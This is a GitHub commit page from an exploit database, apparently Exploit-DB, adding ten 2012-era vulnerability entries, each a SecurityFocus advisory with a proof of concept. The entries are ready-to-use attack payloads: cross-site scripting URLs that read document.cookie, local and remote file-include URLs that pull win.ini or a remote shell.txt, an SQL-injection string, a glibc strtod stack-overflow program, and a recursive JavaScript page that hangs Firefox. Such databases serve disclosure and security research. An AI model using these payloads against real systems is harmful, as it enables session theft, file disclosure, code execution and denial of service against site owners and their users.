Skip to content

Commit 8762b86

Browse files
author
Offensive Security
committed
DB: 2015-07-19
10 new exploits
1 parent e4d0bdd commit 8762b86

11 files changed

Lines changed: 195 additions & 0 deletions

File tree

files.csv

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -33963,3 +33963,13 @@ id,file,description,date,author,platform,type,port
3396333963
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
3396433964
37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
3396533965
37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
33966+
37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0
33967+
37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
33968+
37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0
33969+
37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting Vulnerability",2012-08-10,TayfunBasoglu,php,webapps,0
33970+
37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
33971+
37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include Vulnerability",2012-08-10,L0n3ly-H34rT,php,webapps,0
33972+
37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0
33973+
37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
33974+
37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
33975+
37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0

platforms/cgi/webapps/37638.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/55082/info
2+
3+
LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
6+
7+
LISTSERV 16 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script>

platforms/linux/local/37631.c

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
source: http://www.securityfocus.com/bid/54982/info
2+
3+
GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
4+
5+
Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition.
6+
7+
include <stdio.h>
8+
#include <stdlib.h>
9+
#include <string.h>
10+
11+
#define EXPONENT "e-2147483649"
12+
#define SIZE 214748364
13+
int
14+
main (void)
15+
{
16+
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
17+
if (p == NULL)
18+
{
19+
perror ("malloc");
20+
exit (EXIT_FAILURE);
21+
}
22+
p[0] = '1';
23+
memset (p + 1, '0', SIZE);
24+
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
25+
double d = strtod (p, NULL);
26+
printf ("%a\n", d);
27+
exit (EXIT_SUCCESS);
28+
}

platforms/multiple/dos/37639.html

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
source: http://www.securityfocus.com/bid/55091/info
2+
3+
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
4+
5+
An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.
6+
7+
Mozilla Firefox 14.01 is affected; prior versions may also be affected.
8+
9+
<html>
10+
<head>
11+
<title></title>
12+
</head>
13+
<body></body>
14+
<script>
15+
function e(x)
16+
{
17+
document.body.innerHTML += x;
18+
e(x + 'x');
19+
};
20+
21+
e('x')
22+
</script>
23+
</html>

platforms/php/webapps/37630.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/54980/info
2+
3+
Hotel Booking Portal is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
4+
5+
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Hotel Booking Portal 0.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
10+
http://www.example.com/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
11+
http://www.example.com/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>

platforms/php/webapps/37632.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/54985/info
2+
3+
Total Shop UK eCommerce CodeIgniter is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
CodeIgniter 2.1.2 is vulnerable; other versions may also be affected.
8+
9+
Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1";

platforms/php/webapps/37633.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/54989/info
2+
3+
mIRC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);>

platforms/php/webapps/37634.txt

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/54991/info
2+
3+
MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.
6+
7+
MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
10+
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
11+
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
12+
http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
13+
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
14+
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00

platforms/php/webapps/37635.txt

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/54992/info
2+
3+
GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host are prone to a local file-include vulnerability because they fail to properly sanitize user-supplied input.
4+
5+
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
6+
7+
For GalaxyScripts Mini File Host:
8+
9+
http://www.example.com/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
10+
11+
For DaddyScripts Daddy's File Host:
12+
13+
http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg

platforms/php/webapps/37636.txt

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
source: http://www.securityfocus.com/bid/55062/info
2+
3+
The ShopperPress WordPress theme is prone to an SQL-injection and multiple cross-site vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
Successful exploits will allow an attacker to steal cookie-based authentication credentials, to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.
6+
7+
ShopperPress 2.7 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/wp-admin/admin.php?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
10+
11+
http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
12+
13+
http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
14+
15+
http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--

0 commit comments

Comments
 (0)